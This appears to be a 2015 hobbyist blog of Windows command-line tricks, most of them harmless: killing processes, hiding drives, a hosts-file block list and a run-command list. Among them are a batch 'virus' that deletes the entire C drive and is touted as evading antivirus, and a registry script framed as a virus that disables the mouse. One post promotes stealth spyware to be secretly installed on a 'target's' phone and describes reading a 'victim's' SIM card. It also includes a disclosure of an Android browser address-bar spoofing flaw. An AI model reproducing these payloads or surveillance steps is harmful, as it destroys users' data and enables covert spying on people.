Sunday, September 13, 2015

Kill windows processes using CMD

  1 - open cmd 
 2 - type " tasklist " 
 
 3- Type " taskkill pid/ 8920 " 

             ? 8920 ? is the pid number of the program id  you want to kill or close !
  

  

Share:

How to Hide Hard Drive

 Step 1 - open Cmd 
 Step 2-  Type "Dіskраrt " and hit enter
 Step 3 -  Now you have to type  ” lіst vоlumе ” аnd Hit Enter to see the list of all drives details
 Step 4 - Now i have some personal data in my drive E which i dont want any other person to peep in, So i want to hide it, For that i will type ” Select volume D ”  and hit Enter.

By now you have selected the Drive successfully which you want to hide. But the last part which is to Hide the Drive is still remaining.
Step 6. To hide the drive you have to type “ Remove letter D ” and hit enter.
Congrats you have successfully Hidden the drive.

HOW DO I GET THE DRIVE BACK ?

Share:

How to Block any Website

  1- Go to C:\Windows\System32\drivers\etc









 2- Open hosts file in notepad
 3- Write 127.0.0.1 www.googl.com
 and save ! now google,com will be blocked


# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1       localhost
# ::1             localhost
127.0.0.1  www.google.com






















Share:

Tuesday, September 8, 2015

Create a virus that disable mouse

How To Disable Mouse

  1. Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  2. Save this file as  virus.bat
  3. Done you just created your virus.
Share:

Make Dangerous Virus In A Minute

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. 

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
Share:

Use Web Browsers As Text Editor

In this tutorial i will show you a simple and interesting trick to use your web browser such as Google Chrome or Mozilla Firefox as a simple text editor like Notepad. This trick works on all web browsers. So lets get started.

How To Do ?

1 Copy below code in browser Url Section
 data:text/html, <html contenteditable>

   2. Now Press Enter.
   3. Now you can type anything as would do on any other text editor like Notepad.
   4. To save your text file Press Ctrl + S and save it as anything.txt (.txt Is Must)


Share:

100+ Run Commands List


Accessibility Options : access.cpl
Add Hardware : hdwwiz.cpl
Add / Remove Programs : appwiz.cpl
Administrative Tools : control admintools
Automatic Updates : wuaucpl.cpl
Wizard file transfer Bluethooth : fsquirt
Calculator : calc
Certificate Manager : certmgr.msc
Character : charmap
Checking disk : chkdsk
Manager of the album (clipboard) : clipbrd
Command Prompt : cmd
Service components (DCOM) : dcomcnfg
Computer Management : compmgmt.msc
DDE active sharing : ddeshare
Device Manager : devmgmt.msc
DirectX Control Panel (if installed) : directx.cpl
DirectX Diagnostic Utility : dxdiag
Disk Cleanup : cleanmgr
System Information : dxdiag
Disk Defragmenter : dfrg.msc
Disk Management : diskmgmt.msc
Partition manager : diskpart
Display Properties : control desktop
Properties of the display (2) : desk.cpl
Properties display (tab "appearance") : control color
Dr. Watson : drwtsn32
Manager vérirficateur drivers : check
Event Viewer : Eventvwr.msc
Verification of signatures of files : sigverif
Findfast (if present) : findfast.cpl
Folder Options : control folders
Fonts (fonts) : control fonts
Fonts folder windows : fonts
Free Cell : freecell
Game Controllers : Joy.cpl
Group Policy (XP Pro) : gpedit.msc
Hearts (card game) : mshearts
IExpress (file generator. Cab) : IExpress
Indexing Service (if not disabled) : ciadv.msc
Internet Properties : inetcpl.cpl
IPConfig (display configuration) : ipconfig / all
IPConfig (displays the contents of the DNS cache) : ipconfig / displaydns
IPConfig (erases the contents of the DNS cache) : ipconfig / flushdns
IPConfig (IP configuration cancels maps) : ipconfig / release
IPConfig (renew IP configuration maps) : ipconfig / renew
Java Control Panel (if present) : jpicpl32.cpl
Java Control Panel (if present) : javaws
Keyboard Properties : control keyboard
Local Security Settings : secpol.msc
Local Users and Groups : lusrmgr.msc
Logout : logoff
Microsoft Chat : winchat
Minesweeper (game) : winmine
Properties of the mouse : control mouse
Properties of the mouse (2) : main.cpl
Network Connections : control NetConnect
Network Connections (2) : ncpa.cpl
Network configuration wizard : netsetup.cpl
Notepad : notepad
NView Desktop Manager (if installed) : nvtuicpl.cpl
Manager links : packager
Data Source Administrator ODBC : odbccp32.cpl
Screen Keyboard : OSK
AC3 Filter (if installed) : ac3filter.cpl
Password manager (if present) : Password.cpl
Monitor performance : perfmon.msc
Monitor performance (2) : perfmon
Dialing Properties (phone) : telephon.cpl
Power Options : powercfg.cpl
Printers and Faxes : control printers
Private Character Editor : eudcedit
Quicktime (if installed) : QuickTime.cpl
Regional and Language Options : intl.cpl
Editor of the registry : regedit
Remote desktop connection : mstsc
Removable Storage : ntmsmgr.msc
requests the operator to removable storage : ntmsoprq.msc
RSoP (traduction. ..) (XP Pro) : rsop.msc
Scanners and Cameras : sticpl.cpl
Scheduled Tasks : control schedtasks
Security Center : wscui.cpl
Console management services : services.msc
shared folders : fsmgmt.msc
Turn off windows : shutdown
Sounds and Audio Devices : mmsys.cpl
Spider (card game) : spider
Client Network Utility SQL server : cliconfg
System Configuration Editor : sysedit
System Configuration Utility : msconfig
System File Checker (SFC =) (Scan Now) : sfc / scannow
SFC (Scan next startup) : sfc / scanonce
SFC (Scan each démarraget) : sfc / scanboot
SFC (back to default settings) : sfc / revert
SFC (purge cache files) : sfc / purgecache
SFC (define size CAHC x) : sfc / cachesize = x
System Properties : sysdm.cpl
Task Manager : taskmgr
Telnet client : telnet
User Accounts : nusrmgr.cpl
Utility Manager (Magnifier, etc) : utilman
Windows firewall (XP SP2) : firewall.cpl
Microsoft Magnifier : magnify
Windows Management Infrastructure : wmimgmt.msc
Protection of the accounts database : syskey
Windows update : wupdmgr
Introducing Windows XP (if not erased) : tourstart
Wordpad : write
Date and Time Properties : timedate.cpl












Share:

Sunday, September 6, 2015

Dancing Keyboard Led

    1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.
Share:

Hide Files Behind The Images


There are some important  files or document you want to hide from others on your computer. To do that you might be creating folder inside folder to hide such files but in todays tutorial i will change this by teaching you a interesting trick to hide files behind images.To hide a file behind a image  means that if any one opens that image he will see the image, but to see the hidden file we need to open that image in a specific way. So lets get started.


How To Hide File Behind Image ?

In order to do this you should have basic understanding of command line, but if you don't know check out  tutorial given below.
1. Select an image to be used for hiding file behind the image.
2. Now select a file to hide behind the image and make it in .RAR format. With the help of the WinRAR.
3. And most important is that paste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.
4. Now open cmd by going to Start > Accessories Command Prompt and type following commands in it.
cd desktop 
Share:

Tuesday, September 1, 2015

Android Browser All Versions - Address Bar Spoofing Vulnerability - CVE-2015-3830

Introduction

Google security team themselves state that "We recognize that the address bar is the only reliable security indicator in modern browsers" and if the only reliable security indicator could be controlled by an attacker it could carry adverse affects, For instance potentially tricking users into supplying sensitive information to a malicious website due to the fact that it could easily lead the users to believe that they are visiting is legitimate website as the address bar points to the correct website.  

Android Stock Browser Address Bar Spoofing


Few months ago i discovered an address bar spoofing vulnerability affecting Android Stock Browser on all Android versions. The tests were carried out on Android Lollipop and later were confirmed on prior versions. 

The issue is caused due to the fact that the browser fails to handle 204 error "No Content" responses when combined with window.open event and therefore allowing us to spoof the address bar.

Steps To Reproduce


1) Visit http://sh.st/vAELA with Unpatched Android Stock Browser.
2) click the "Click here to be redirected" button
3) Android browser will open a new tab with the browser pointing to "http://www.google.com/csi" in the address bar, which makes the victim believe that they are infact visiting a legitimate website, however in reality the page is not hosted on google.com. 
4) As soon as the victim enters his/her credentials, they are sent to attacker.com

Note: Please visit http://sh.st/vAEXZ for unrendered version of the POC.

Proof of Concept

The following is a screenshot of Samsung Galaxy S5 running latest android stock browser, as you may notice that the address bar points to https://www.google.com/csi (Which returns a 204 response), which makes the user believe that he is infact visiting a legitimate site however it's hosted on attacker's domain name. 
 
Notes: Joe Vennix suggests that you might have to play with my timeout value , and he found 1500 - 2000 to work much more consistently. This issue is due to the fact that,  In case if the timeout fires too soon (before the NO CONTENT response is received from gmail.com), the new page will just have a blank URL bar.


Credits

The proof of concept was initially created by me, however it was later modified and improvised by "Joe Vennix". I would like to sincerely thank "Tod Beardsley" from Rapid7 team for handling the disclosure for me. Kudos!

Mitigation

The Android security team has responded by releasing patches committed to both Kitkat and Lollipop main distributions. Users are advised to contact their carriers to determine if they have received updated versions of these operating systems."
Share:

How to Spy on Text Messages

It seems that in recent years most of society, especially the younger generations, have turned to texting as their preferred mode of conversation. The infinite ability to communicate with other people around the world effortlessly has become a growing concern for parents and employers alike who wish to 'keep an eye on', or monitor, their children or employees. In this post we will discuss the methods and implications of text message spying.



Methods To Spy On Text Messages

There are several methods to spy on text messages, however we would only discuss the following two methods which happen to be easy for parents/employeers to monitor their children/employees  activities.

Method 1: Using a Spying App

The easiest way to spy on text messages is to use one of spying application. Today there exist literally hundred's of products claiming to spy on text messages, however most of them are overpriced or they are not compatible with wide variety of smartphones. With that being said, there are still very few spying softwares that stand out to competition and one of my favorite is mspy.

mspy posses state of art stealth capabilities to spy on various text messaging applications such as Whatsapp, Viber, Facebok Messenger, LINE so on and so forth. Apart from that you can also monitor call logs and track location of smartphone (Absolutely must have for Parents).  The best part being that you don't have to jailbreak your iOS device or root your android device in order to install it.

How it works?

Upon placing and order for mspy, you would receive an application that you have to install on target's phone by simply launching the browser from the target phone, typing the URL and downloading and executing the application. Once you have successfully installed it, it would send alerts to your control panel or account which would be created once you have signed up. In case of any issue you can simply contact their 24/7 support team.

Features

  • Monitor call logs, SMS and Contacts 
  • Spy on Internet activity including social media like Facebook, Twitter and Gmail.
  • It is not detected by antiviruses and operates in complete stealth mode,.
  • Spy on text messaging apps like WhatsApp, iMessage, Viber, Snapchat, Skype, LINE and more.
  •  Track GPS locations in real-time.
  •  Spy on all multimedia content stored on a device. Monitor what childrens are storing on their devices. 
  • 24/7 live support.

Compatibility

  • iPhone/iPad (iOS 6 – 8.3)
  • Android Phones (Version 4+)
Disclaimer: SOFTWARE INTENDED FOR LEGAL USES ONLY. It is the violation of the United States federal and/or state law and your local jurisdiction law to install surveillance software, such as the Licensed Software, onto a mobile phone or other device you do not have the right to monitor. RHA shall not be responsible for any misuse of this product.

Method 2: Using SIM Card Reader To Recover Messages

In case, if you can't afford an spying app, you could look for free alternatives, however there are few drawbacks to it. One being that a lot of them found on forums are backdoored, also they require good amount of technical knowledge to setup and operate. Another way is to buy a SIM card reader from market and use victim's SIM card to recover messages or phone contacts stored on it.

Requirements

  • PC/SC compliant smart card reader
Note: Some phones tend to keep messages inside their internal memory, in that case you have to move messages from internal memory to SIM card. 

Step 1: Download "Dekart SIM Manager"from here.
Step 2: Once the sim card has been plugged into the SIM card reader and the card reader has been connected to your computer. Press the"READ" button to read the messages, GSM contacts, last dialed numbers etc. 
Step  3 -> Since, our aim here is to recover deleted messages, we would go to the "SMS messages" tab. To recover a message right click on a message and select "Undelete" option.  Once this is done, press the "Write" button to write it on the sim card. 

Note: The messages marked in "RED" are deleted messages where as the messages marked in black are the ones which are still available on the sim card.  

Note: Please note that this method can only be used to recover SMS messages that are stored on the SIM not Whatsapp, Viber etc messages. To overcome this, I would suggest you to use method 1. 


Share:

as